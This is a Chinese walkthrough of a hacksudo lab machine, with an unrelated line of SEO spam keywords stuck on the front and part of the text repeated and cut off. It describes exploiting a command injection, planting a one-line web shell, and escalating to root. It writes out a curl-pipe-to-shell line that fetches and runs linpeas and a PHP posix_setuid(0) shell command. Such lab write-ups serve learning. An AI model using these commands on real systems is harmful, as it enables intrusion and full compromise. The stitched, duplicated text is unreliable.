建设银行交学费网站2018,羽毛球赛事最新消息,石家庄移动互联网开发,如何扁平化设计网站环境配置
一开始桥接错网卡了 搞了半天 改回来就行了
信息收集 漏洞发现
扫个目录 大概看了一眼没什么有用的信息 然后对着login.php跑了一下弱口令 sqlmap 都没跑出来 那么利用点应该不在这 考虑到之前有过dirsearch字典太小扫不到东西的经历 换个gobuster扫一下 先看看g…环境配置
一开始桥接错网卡了 搞了半天 改回来就行了
信息收集 漏洞发现
扫个目录 大概看了一眼没什么有用的信息 然后对着login.php跑了一下弱口令 sqlmap 都没跑出来 那么利用点应该不在这 考虑到之前有过dirsearch字典太小扫不到东西的经历 换个gobuster扫一下 先看看generator.php 随便填点东西执行一下 感觉像命令注入 尝试弹个shell 没成功 那就写了个一句话 然后用蚁剑传shell
提权
优化shell
看看还有没有用户,有可能待会会切过去 用linpeas枚举脆弱性 curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
没看见特别显眼的 版本过高 考虑到有个hacksudo的用户 再收集一波信息看看能不能切过去 发现有个hacksudo的文件 有加密 一眼凯撒
没有sudo权限 在work路径下发现sh文件 没执行权限 也没看见相关的计划任务 再传个linpeas枚举 可以lxd提权 也可以view 或 php提权 这里用php提权
CMD/bin/sh
./home/hacksudo/locker/php -r posix_setuid(0); system($CMD);
